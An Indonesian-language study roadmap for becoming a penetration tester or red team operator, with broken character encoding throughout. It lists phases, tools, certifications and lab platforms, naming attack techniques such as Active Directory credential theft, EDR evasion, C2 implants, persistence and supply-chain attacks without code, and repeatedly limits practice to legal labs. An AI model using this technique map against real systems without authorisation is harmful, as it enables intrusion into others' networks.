π‘οΈ Roadmap Offensive Security β Red Team / Penetration Tester
Filosofi: Kalau kamu cuma bisa jalankan
nmap -sV target, itu artinya kamu bisa scan. Tapi kalau kamu bisa enumerate β exploit β privilege escalate β pivot β exfiltrate β tulis laporan profesional, itu artinya kamu paham kill chain end-to-end β dan itu yang ditanya waktu interview. Rekruter akan tanya βoke, kamu dapet shell user, terus?β Kalau kamu jawab βsaya enumerate SUID binaries, dapet misconfigured sudo, eskalasi ke root, lalu pivot ke mesin lain via SSH key yang saya temukan di home directoryβ β itu yang menutup pertanyaan.
Peringatan Legal
Semua teknik di sini hanya boleh dipraktekkan di lab sendiri atau platform legal (HackTheBox, TryHackMe, PentesterLab). Scanning/exploiting tanpa izin tertulis = tindak pidana. Tidak ada pengecualian.
π― Checkpoint Awal β Sebelum Mulai
Stack : Kali Linux VM β Metasploitable/DVWA (target) di Proxmox
Jalur : Penetration Tester / Red Team Operator
Spek : i7 Gen7, 8GB RAM, GTX 1050
Target Karir: Junior Pentester β Pentester β Red Team Operator β APT Simulator
Urutan belajar:
Fase 1 (fondasi) : Linux + Networking + Python scripting
Fase 2 (recon & exploit) : Nmap β Burp Suite β Metasploit β SQLMap
Fase 3 (post-exploit) : PrivEsc β BloodHound β AD Attack β Lateral Movement
Fase 4 (red team ops) : C2 Framework β Evasion β Purple Team Validation
Fase 5 (profesional) : Report Writing β Methodology β Lab Exam
Next step: Setup Kali VM + target VM (Metasploitable3 atau HackTheBox VPN)
Fase 1 β Fondasi Wajib (Minggu 1β6)
Goal: Tanpa fondasi ini, semua tool hanya jadi tombol yang kamu tekan tanpa paham kenapa. RAM Impact: Minimal β teks editor dan terminal.
| Skill | Yang Dipelajari | Combo A+B yang Membuktikan |
|---|---|---|
| Linux CLI Mastery | Bash scripting, file permissions, process management, service control | Linux + bash one-liner untuk automate recon = kamu bisa bikin tool sendiri |
| Networking Deep | TCP handshake, HTTP methods, DNS resolution, ARP, routing, NAT, firewall bypass | Networking + Wireshark analysis = kamu paham apa yang terjadi di wire level |
| Python for Hacking | Socket programming, HTTP requests, parsing, automation, pwntools | Python + custom exploit script = kamu bukan script kiddie |
| Web Fundamentals | HTTP/HTTPS, cookies, sessions, CORS, CSP, SOP, OAuth flow | Web + manual request crafting (curl/Burp) = kamu paham web attack surface |
Jangan Skip Ini
90% orang yang gagal OSCP bukan karena exploit-nya susah β tapi karena fondasi Linux/networking/scripting mereka lemah. Fase 1 menentukan segalanya.
Proyek Portofolio Fase 1:
Custom Recon Tool β Python script yang otomatis: resolve DNS β port scan β banner grab β screenshot web β output ke markdown report. Ini menunjukkan kamu bisa automate, bukan cuma klik tombol.
Fase 2 β Reconnaissance & Exploitation (Minggu 7β16)
Goal: Dari target yang tidak dikenal β mendapatkan akses initial. Ini inti pentest. RAM Impact: Kali VM ~2GB + Target VM ~1GB = ~3GB.
| Tool/Skill | RAM | Yang Dipelajari | Combo A+B yang Membuktikan |
|---|---|---|---|
| Nmap | ~100MB | Port scanning, service detection, NSE scripts, OS fingerprint | Nmap + service-specific exploit = kamu bisa dari scan β shell |
| Burp Suite | ~500MB | Web proxy, interceptor, repeater, intruder, scanner | Burp + manual finding = kamu paham web vuln, bukan cuma scan otomatis |
| Metasploit | ~400MB | Exploit framework, meterpreter, post-exploit modules | Metasploit + manual exploit tanpa Metasploit = kamu paham exploit mechanics |
| SQLMap / Manual SQLi | ~100MB | SQL injection β union-based, blind, time-based, error-based | SQLMap + manual injection = kamu bisa jelaskan kenapa query inject-able |
| Gobuster / ffuf | ~50MB | Directory brute force, vhost enumeration, parameter fuzzing | Gobuster + custom wordlist = kamu paham attack surface discovery |
Jangan Jadi Script Kiddie
Untuk setiap tool otomatis yang kamu pakai, pastikan kamu bisa melakukan hal yang sama secara manual. Rekruter PASTI tanya: βoke, Metasploit dapet shell. Sekarang lakukan tanpa Metasploit.β Kalau tidak bisa β kamu bukan pentester, kamu operator tool.
Proyek Portofolio Fase 2:
HackTheBox/TryHackMe Writeups β dokumentasikan 10+ mesin yang kamu solve. Setiap writeup harus punya: recon methodology β vulnerability analysis β exploitation β proof of concept β remediation recommendation. Publish di GitHub atau blog.
Fase 3 β Post-Exploitation & Active Directory (Minggu 17β26)
Goal: Dari user shell β domain admin. Ini yang memisahkan pentester dari button clicker. RAM Impact: AD lab butuh ~4-5GB (DC + client). Matikan semua service lain.
| Skill/Tool | RAM | Yang Dipelajari | Combo A+B yang Membuktikan |
|---|---|---|---|
| Linux PrivEsc | β | SUID, cron abuse, path hijack, kernel exploit, capability abuse | PrivEsc + custom enumeration = kamu bisa eskalasi tanpa LinPEAS |
| Windows PrivEsc | β | Token impersonation, service misconfig, UAC bypass, potato attacks | PrivEsc + manual checks = kamu paham privilege model Windows |
| BloodHound | ~500MB | Active Directory attack path analysis β visualisasi graph untuk menemukan jalur privilege escalation di AD | BloodHound + custom Cypher queries = kamu bisa identify attack path yang tool default tidak temukan |
| CrackMapExec | ~200MB | Swiss army knife untuk pentesting Windows/AD β credential spraying, command execution, enumeration, dan lateral movement | CME + pass-the-hash chain = kamu bisa lateral movement tanpa plaintext password |
| Impacket | ~150MB | Python library untuk network protocols β SMB, MSRPC, LDAP, Kerberos. Foundation untuk banyak tool Windows exploitation | Impacket + custom script = kamu bisa bikin tool Windows exploitation sendiri |
| Active Directory Attack | ~4GB | Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync, Golden Ticket | AD + full attack chain = kamu paham enterprise environment |
| Lateral Movement | β | SSH pivot, port forwarding, proxychains, chisel, ligolo-ng | Pivot + multi-hop network = kamu bisa operasi di segmented network |
| Persistence | β | Scheduled tasks, registry, WMI, SSH keys, web shells | Persistence + detection evasion = kamu paham apa yang Blue Team cari |
Tool References
BloodHound, CrackMapExec, dan Impacket adalah tiga tool yang menghubungkan Fase 3 dengan Application_Offensive.html. Tanpa pemahaman ketiga tool ini, AD attack tidak bisa dieksekusi secara sistematis.
Lab AD Murah
Proxmox β Windows Server 2019 eval (gratis 180 hari) + Windows 10 eval β setup domain. Atau pakai GOAD (Game of Active Directory) β automated AD lab deployment via Vagrant. Ini lab AD paling lengkap yang gratis.
Proyek Portofolio Fase 3:
Active Directory Attack Lab β Full Kill Chain β dokumentasikan: initial access (phishing sim) β BloodHound enumeration β kerberoasting β CrackMapExec lateral movement β Pass-the-Hash β Impacket DCSync β Golden Ticket β domain admin. Dengan diagram kill chain dan rekomendasi defense.
Fase 4 β Red Team Operations & C2 (Minggu 27β34)
Goal: Dari pentester β red team operator. C2 framework dan evasion adalah batasan yang memisahkan keduanya. RAM Impact: C2 server + target = ~3-4GB. C2 framework sendiri ringan tapi butuh VM multiple.
| Skill/Tool | RAM | Yang Dipelajari | Combo A+B yang Membuktikan |
|---|---|---|---|
| Sliver C2 | ~300MB | Open-source C2 framework β cross-platform implant, multiplayer mode, DNS/HTTP/HTTPS beaconing | Sliver + malleable C2 profile = kamu bisa customize traffic untuk menyerupai legitimate app |
| Havoc C2 | ~400MB | Modern post-exploitation C2 β sleep obfuscation, x64 return address spoofing, indirect syscalls | Havoc + sleep obfuscation config = kamu paham cara evade memory scanner EDR |
| Mythic | ~500MB | Collaborative red teaming platform β Docker-based agents, real-time callback, extensible payload | Mythic + custom agent development = kamu bisa extend capability dengan C/C++ code |
| Cobalt Strike (trial) | ~600MB | Commercial adversary simulation β malleable C2 profile, beaconing, post-exploitation toolkit | CS + profile customization = kamu paham traffic shaping untuk bypass NGFW |
| Evasion Basics | β | Sleep obfuscation, indirect syscalls, AMSI bypass (konsep), ETW bypass (konsep) | Evasion + EDR testing = kamu paham apa yang Blue Team deteksi dan kenapa |
| Atomic Red Team | ~200MB | Library of tests mapped to MITRE ATT&CK β simulate TTPs nyata untuk validasi detection | Atomic + custom test = kamu bisa validate detection capability blue team |
| Caldera | ~1GB | Adversary emulation platform by MITRE β automate ATT&CK TTPs, plan operations | Caldera + operation planning = kamu bisa measure defensive coverage organisasi |
Evasion = Konsep, Bukan Praktek Illegal
Evasion technique di sini dipelajari sebagai konsep untuk memahami apa yang EDR deteksi. Implementasi full evasion butuh environment khusus dan legal clearance. Jangan praktekkan di production.
Purple Team Mindset
Red Team Operator yang baik adalah yang paham apa yang Blue Team lihat. Setiap kali kamu jalankan C2, tanyakan: βalert apa yang muncul di SIEM?β Kalau tidak tahu β kamu bukan Red Team, kamu Black Box.
Proyek Portofolio Fase 4:
Purple Team Exercise β C2 vs Detection β setup Sliver/Havoc β jalankan implant β capture traffic β analisis apa yang terdeteksi Wazuh/Suricata β tulis detection gap analysis. Ini menunjukkan kamu paham kedua sisi.
Fase 5 β Profesionalisasi & Sertifikasi (Minggu 35β40)
Goal: Dari hacker β professional pentester/red team operator. Report writing dan methodology yang membedakan.
| Skill | Yang Dipelajari | Combo A+B yang Membuktikan |
|---|---|---|
| Report Writing | Executive summary, findings, severity rating (CVSS), remediation, evidence | Report + professional template = kamu bisa deliver ke klien |
| Methodology | OWASP Testing Guide, PTES, OSSTMM, MITRE ATT&CK mapping | Methodology + structured approach = kamu bukan random scanner |
| OSCP Lab | Real pentest lab β 70+ machines, 24-jam exam, report submission | OSCP + pass = industry gold standard. Ini membuka pintu |
| Bug Bounty | HackerOne, Bugcrowd β real targets, real money, real experience | Bug bounty + hall of fame / payout = proof of skill yang tidak bisa dipalsukan |
Proyek Portofolio Fase 5:
Professional Penetration Test Report β full pentest report template: scope, methodology, executive summary, technical findings (dengan screenshot + PoC), risk rating, remediation timeline. Format yang bisa langsung dipakai untuk klien.
π΄ Red Team Operator Tracks (Spesialisasi)
Setelah Fase 5, pilih spesialisasi berdasarkan minat dan karir target:
Track A: Corporate Red Team
Fokus: Simulasi APT nyata di enterprise environment. Custom implant, long-term persistence, data exfiltration simulation.
| Skill | Tool | Level |
|---|---|---|
| Custom C2 Development | Sliver Armory, NimPlant, Mythic agent dev | β οΈ Danger |
| Evasion Engineering | ScareCrow, Inceptor, PEzor, AceLdr | β οΈ Danger |
| Physical Security Assessment | Flipper Zero, USB Rubber Ducky, LAN Turtle | β οΈ Warning |
| Social Engineering Campaign | GoPhish, SET, custom pretext development | β οΈ Warning |
Track B: Web Application Specialist
Fokus: Deep dive web security, API security, cloud-native application.
| Skill | Tool | Level |
|---|---|---|
| Advanced Web Exploitation | Burp Suite Pro, custom extension development | β οΈ Warning |
| API Security Testing | Postman, Arjun, custom fuzzing | ⬑ Intermediate |
| Cloud Pentesting | ScoutSuite, Prowler, CloudFox | β οΈ Warning |
| Bug Bounty Hunting | Custom automation, recon pipeline | ⬑ Intermediate |
Track C: Infrastructure / Network Pentester
Fokus: Network segmentation testing, firewall bypass, wireless assessment.
| Skill | Tool | Level |
|---|---|---|
| Network Protocol Exploitation | Scapy, Impacket custom, Responder | β οΈ Warning |
| Wireless Security Assessment | Aircrack-ng, Bettercap, WiFi Pineapple | β οΈ Warning |
| VoIP / Telecom Pentesting | SIPVicious, Viproy | β οΈ Danger |
| Mainframe / Legacy System | TN3270 exploitation, custom protocol | β οΈ Danger |
Track D: APT Simulator / Nation-State Level
Fokus: Simulasi threat actor advanced. Custom malware, zero-day research, hardware implant.
| Skill | Tool | Level |
|---|---|---|
| Custom Malware Development | C/C++ implant, position-independent shellcode | β οΈ Danger |
| Hardware Implant | O.MG Cable, malicious USB device, PCIe DMA | β οΈ Danger |
| Supply Chain Attack | Dependency confusion, typosquatting, CI/CD poison | β οΈ Danger |
| Zero-Day Research | Fuzzing, reverse engineering, vulnerability discovery | β οΈ Danger |
Track D Boundary
Track D memerlukan legal framework yang jelas β biasanya hanya dijalankan oleh government agency, military, atau contractor dengan clearance. Jangan eksplorasi tanpa legal backing.
Roadmap Visual β Timeline 10 Bulan
Bulan 1-2 Bulan 3-4 Bulan 5-6 Bulan 7-8 Bulan 9 Bulan 10
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββ βββββββββββββββ
β FASE 1 β β FASE 2 β β FASE 2β3 β β FASE 3 β β FASE 4 β β FASE 5 β
β β β β β β β β β β β β
β Linux CLI β β Nmap β β PrivEsc Linux β β BloodHound β β Sliver C2 β β OSCP Lab β
β Networking β β Burp Suite β β PrivEsc Win β β CrackMapExec β β Havoc C2 β β Report β
β Python β β Metasploit β β Pivot/Tunnel β β Impacket β β Evasion β β Bug Bounty β
β Web Basics β β Web Exploits β β β β AD Full Chain β β Atomic Red β β β
β β β β β β β β β Caldera β β β
β β β β β β β β β β β β
β βΊ Custom Tool β β βΊ 10 Writeups β β βΊ PrivEsc Lab β β βΊ AD Lab Doc β β βΊ Purple β β βΊ OSCP Exam β
β β β β β β β β β Exercise β β β
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββ βββββββββββββββ
β² β² β² β² β² β²
β β β β β β
Portfolio: Portfolio: Portfolio: Portfolio: Portfolio: Portfolio:
Recon Tool HTB Writeups PrivEsc Lab AD Kill Chain Purple Team OSCP + Report
Sertifikasi yang Cocok per Fase
| Fase | Sertifikasi | Kenapa |
|---|---|---|
| Setelah Fase 1 | eJPT (eLearnSecurity Junior Pentester) | Entry-level, murah (~$250), validasi fondasi |
| Setelah Fase 2-3 | PNPT (Practical Network Penetration Tester) | Practical exam + report β lebih realistis dari CEH |
| Setelah Fase 4 | OSCP (Offensive Security Certified Professional) | THE gold standard. Setiap job posting minta ini |
| Setelah Fase 5 | OSEP (Offensive Security Experienced Penetration Tester) | Evasion, C2, anti-virus bypass β Red Team level |
| Track D | CRTO (Certified Red Team Operator) | C2 framework, adversary simulation, detection evasion |
| Track D Advanced | OSWE (Offensive Security Web Expert) | Web app exploitation expert |
Platform Latihan (Gratis β Berbayar)
| Platform | Tipe | Harga | Cocok Untuk |
|---|---|---|---|
| TryHackMe | Guided labs | Gratis (terbatas) / $10/bulan | Pemula β learning path terstruktur |
| HackTheBox | Challenge labs | Gratis (retired) / $14/bulan | Intermediate β real-world simulation |
| PentesterLab | Web exploit | $20/bulan | Web security deep dive |
| GOAD Lab | AD lab | Gratis | Active Directory β self-hosted |
| VulnHub | Downloadable VM | Gratis | Offline practice |
| CyberDefenders | Blue vs Red | Gratis | Purple Team exercise |
π Lihat Juga
- Master Index
- Endpoint Security β CPU Ring & Boot Chain Threat
- Cheat Engine β Game hacking = offensive security dalam konteks gaming
- Hardware Hacking β Binary exploitation & firmware RE
- Underground Knowledge β Dual-use technique landscape
- Cyber Security Roadmap β Lawannya: Blue Team defense
- Master Arsenal β HTML arsenal tool reference
- Offensive Security Hierarchy β Level 0β6 offensive hierarchy (terpisah)
Roadmap Offensive Security | Fase 1 (Fondasi) β Fase 5 (OSCP) β Track D (APT Simulator) Β· 10 Bulan